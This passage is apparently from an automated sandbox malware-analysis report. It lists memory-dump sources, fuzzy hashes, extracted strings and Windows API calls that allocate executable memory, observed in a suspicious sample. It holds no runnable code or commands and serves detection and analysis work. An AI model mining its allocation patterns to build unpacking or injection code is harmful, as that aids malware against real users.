                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: EXEC$Y]KB
                    • API String ID: 292159236-105863924
                    • Opcode ID: e2afc85f620da47da50744ab62e302b2ed2d2512b450606bc0565a79c6269584
                    • Instruction ID: 89e74d8cc54d01796f1b9580617f2361b5aa9340b47f026751142dad0668e4d7
                    • Opcode Fuzzy Hash: e2afc85f620da47da50744ab62e302b2ed2d2512b450606bc0565a79c6269584
                    • Instruction Fuzzy Hash: 9652BB71104B418BD336CF29D4947A3BBE2BF66314F188A5ED4EB8BB92D774A409CB50
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CAB42
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003CAB97
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: IXta$JaLc$`w$~w
                    • API String ID: 292159236-2358998091
                    • Opcode ID: 80815b79dba12e5bb4a5472071d169460dac78fffe25a7ef6a9dce99589bbf83
                    • Instruction ID: 1efc46cedf4c2e2197f0f9d973630bba38652a33978e199a5a6cbee7fbc29584
                    • Opcode Fuzzy Hash: 80815b79dba12e5bb4a5472071d169460dac78fffe25a7ef6a9dce99589bbf83
                    • Instruction Fuzzy Hash: DC611CB0219385AFD364CF18D884B6BBBF5FB81748F50991CF5A58B2A1D7B4C805CB82
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00100000,00003000,00000004), ref: 003E19A0
                    • NtAllocateVirtualMemory.NTDLL(000000FF,0000BA00,00000000,?,00003000,00000040), ref: 003E1AA0
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000010,00008000), ref: 003E1AFC
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00010000,00008000), ref: 003E1B46
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000004), ref: 003E1B6C
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E1E54
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 00f269e3f8b60e05468b6b961dd3ebefb3d7af972c1a380bd9451fe8d220ec87
                    • Instruction ID: a7230f21e489508be45de2ecd13c318665e68b262fe5cc491e6edf2ae74bb0eb
                    • Opcode Fuzzy Hash: 00f269e3f8b60e05468b6b961dd3ebefb3d7af972c1a380bd9451fe8d220ec87
                    • Instruction Fuzzy Hash: F3D19B716083959FC715CF29C890B2BBBE5ABC9314F148B2CF9A58B3D1D7B19904CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: .$.$0$[$false$null$true
                    • API String ID: 0-2094208800
                    • Opcode ID: 5c06d27b1e8507ce7f1153f6f473524ac05afc95337bb5cc4c83269efb6345dd
                    • Instruction ID: 23952251dd1dc694b310c59839dc174d3ab776ee77b7f7f0e5a9dead9095bc36
                    • Opcode Fuzzy Hash: 5c06d27b1e8507ce7f1153f6f473524ac05afc95337bb5cc4c83269efb6345dd
                    • Instruction Fuzzy Hash: FC023EB0A003098BD7125F25DC597A7BBE8BF4034CF59453CEA858B792EB75D904CB52
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: amjh
                    • API String ID: 0-1051360590
                    • Opcode ID: 27d25c7b719540e188db9ce4d67cbdc45de735fe7123f24b23862d0deb24faf4
                    • Instruction ID: b3cee0bc67c0a2bf2106a24de5dc6fe54bdb4484daebbcf0ff63cee0d8a58d01
                    • Opcode Fuzzy Hash: 27d25c7b719540e188db9ce4d67cbdc45de735fe7123f24b23862d0deb24faf4
                    • Instruction Fuzzy Hash: A0E19A711093908FD725CF18C890BAFB7E5FB88714F058A2DE9A99B390CB759905CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E64A8
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 003E6506
                    • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 003E65CB
                    • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 003E6628
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: R-,T
                    • API String ID: 292159236-635581381
                    • Opcode ID: 762e8fb2db551a3e3ca92e456da6f6b4fe6b1652bc4165d665497c7fd388b71d
                    • Instruction ID: aee717329074c0ed20d05424315c915eb771c88fd1ff5b198f6673b4709b75f4
                    • Opcode Fuzzy Hash: 762e8fb2db551a3e3ca92e456da6f6b4fe6b1652bc4165d665497c7fd388b71d
                    • Instruction Fuzzy Hash: 19B1AD752083518FC311CF19C881B2AF7E6EF98354F158A2CE9A48B3E0D7B1E905CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$C$E$G$L$Z$w
                    • API String ID: 0-3096178343
                    • Opcode ID: c18176de97d8f5dd1db6028488d32b23572d519a5b2e7193f1f56188cae4e67f
                    • Instruction ID: 200dd44afba70b0182b513b2334dfd9fdc47bee4f955c342e2f68a1f253cb0bb
                    • Opcode Fuzzy Hash: c18176de97d8f5dd1db6028488d32b23572d519a5b2e7193f1f56188cae4e67f
                    • Instruction Fuzzy Hash: C9A1C87660D3808FD726CB28D89579EBBD2ABD5320F198B2DD4E98B3C1D7799804C742
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E12C9
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E1319
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E13DD
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 003E1427
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 91ef93e091c6d00b3f520d1130408dfba1f25c388a9bb2f24553014bbb578c7c
                    • Instruction ID: 5d0198bf0bcc696d36d2268551796a1450b49f4ceaf774a004e7f2f3d8473883
                    • Opcode Fuzzy Hash: 91ef93e091c6d00b3f520d1130408dfba1f25c388a9bb2f24553014bbb578c7c
                    • Instruction Fuzzy Hash: 895199712093509FD311CF19C844B2BBBE9EB88718F158A2DF5A89B3D0D7B5D909CB92
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 003C484D
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 003C487E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID: qrs
                    • API String ID: 237503144-2859022563
                    • Opcode ID: 8b37c0d5ed698508180a2d10c34aacc77ff099a054981229bec46c9de33405a8
                    • Instruction ID: d704d7639a7d21bd30cbc1cc63f690b56a0c81503aa39733fa53049cfe2de3b8
                    • Opcode Fuzzy Hash: 8b37c0d5ed698508180a2d10c34aacc77ff099a054981229bec46c9de33405a8
                    • Instruction Fuzzy Hash: 0351AE702183919FD331DF14C8A1FABB7F8EF86714F404A1CE9999B691DB709904CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CA926
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003CA97C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: 45
                    • API String ID: 292159236-2889884971
                    • Opcode ID: feaa2ad1c0059413b5ecf929cab71a45fcb3ab82854b68cf33d986fa5e7202ec
                    • Instruction ID: 61022a13fa84d5ff2f17bea262b43cc42b8337235dea1310abc1094d63d053f5
                    • Opcode Fuzzy Hash: feaa2ad1c0059413b5ecf929cab71a45fcb3ab82854b68cf33d986fa5e7202ec
                    • Instruction Fuzzy Hash: E4510EB11183859FE325CF14C885B5BBBE9BB85308F508A1DF5A58B290C7B59809CF93
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5B5F
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E5BB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: $
                    • API String ID: 292159236-3993045852
                    • Opcode ID: 290787a57efc804fe31ee17e57a1c1ae3ee3c03ccf2fabe77eb9f3eab183d9e2
                    • Instruction ID: cb677a83e3188d14c1a9ac63c875421afe8c8118c033aed7dfb72bce92f947d8
                    • Opcode Fuzzy Hash: 290787a57efc804fe31ee17e57a1c1ae3ee3c03ccf2fabe77eb9f3eab183d9e2
                    • Instruction Fuzzy Hash: 99318F71208311AFE311CF59CC81B5BBBE9EB84754F114A18F9A49B3E0C7F1A945CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C2460
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C24AA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: E~a
                    • API String ID: 292159236-3518370834
                    • Opcode ID: 0d1ac0a871109582ef05d23d7485ed2751c1f20ad6c156da55a55dc2da763866
                    • Instruction ID: 4dc646056a73be1bea374cceafbf8b7f5d5ee9b416797f7034e4289a1bc6e59b
                    • Opcode Fuzzy Hash: 0d1ac0a871109582ef05d23d7485ed2751c1f20ad6c156da55a55dc2da763866
                    • Instruction Fuzzy Hash: 9D311875200B008FD725CF25C881B67B7F9FB48304F148A1DE6A68BBA0C7B5A905CB90
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CC80C
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CC85F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: &>$>
                    • API String ID: 292159236-3126926185
                    • Opcode ID: b974a199b532b52b23c270d2a14fdc6b5fab61ae0c7430c223e2c276a362917e
                    • Instruction ID: 5703e1f5175063a179e0309c35c6861cce239e2421520693a96a9de0088ae44f
                    • Opcode Fuzzy Hash: b974a199b532b52b23c270d2a14fdc6b5fab61ae0c7430c223e2c276a362917e
                    • Instruction Fuzzy Hash: 14214A75211B449FE725CF28C845BA7B3E8FB46304F444A1DE6FA8B690DBB46844CB92
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 003C3242
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 003C328F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID:
                    • API String ID: 237503144-0
                    • Opcode ID: 695543a33c1f41ff7e0dfaa91900f6a0b9b9b47ccb2387f6d3155b9aa20933ab
                    • Instruction ID: fb93abc901fe6b904c669e4d959cbbbc504b9ed98257d5b0f7cd0c3b0cb1f0b3
                    • Opcode Fuzzy Hash: 695543a33c1f41ff7e0dfaa91900f6a0b9b9b47ccb2387f6d3155b9aa20933ab
                    • Instruction Fuzzy Hash: DFD16975600B008FD72ACF24C891BA7B7E1EF49304F148A5DD4AACB7A2DB35E945CB90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0$8
                    • API String ID: 0-46163386
                    • Opcode ID: b35d5e2c12c17be76bf0d6ed3307e9a94d3e2fdfbe54504ad461c87e46dade17
                    • Instruction ID: e83225a0b422904a429c602cb91ffbfadb408add2370b531812f85f7892e5aa6
                    • Opcode Fuzzy Hash: b35d5e2c12c17be76bf0d6ed3307e9a94d3e2fdfbe54504ad461c87e46dade17
                    • Instruction Fuzzy Hash: 2C7267756087409FD725CF18C840B9ABBE2BFC8358F08892DFA898B791D775D944CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C9E02
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C9E64
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 421e0e014e143224588566eb03d51b6063bf7e5f5e136f6d99d86f9a55e710c6
                    • Instruction ID: ca6c59b26e1375ed6524cea6d0b70be9f425fc4cf2f945bcdeebfb46b078886c
                    • Opcode Fuzzy Hash: 421e0e014e143224588566eb03d51b6063bf7e5f5e136f6d99d86f9a55e710c6
                    • Instruction Fuzzy Hash: B361E271609241CFE725CF18D894B6AB3E9FBC8314F45866DE49A9B3E0C771E941CB81
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E15A2
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E15F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 6965800ad97a91b8b504ab7a8124b6998c1c37b187aac9a04346a811a95dd8dd
                    • Instruction ID: 6449049379f6865075cc5aa78fd81b16c029b4cabe3fcb3d59db6e4829719fe1
                    • Opcode Fuzzy Hash: 6965800ad97a91b8b504ab7a8124b6998c1c37b187aac9a04346a811a95dd8dd
                    • Instruction Fuzzy Hash: 503159B11093119FE305CF05C884B6BBBE8EB84358F158A1DF8A98B3D0D7B5D949CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 003C6561
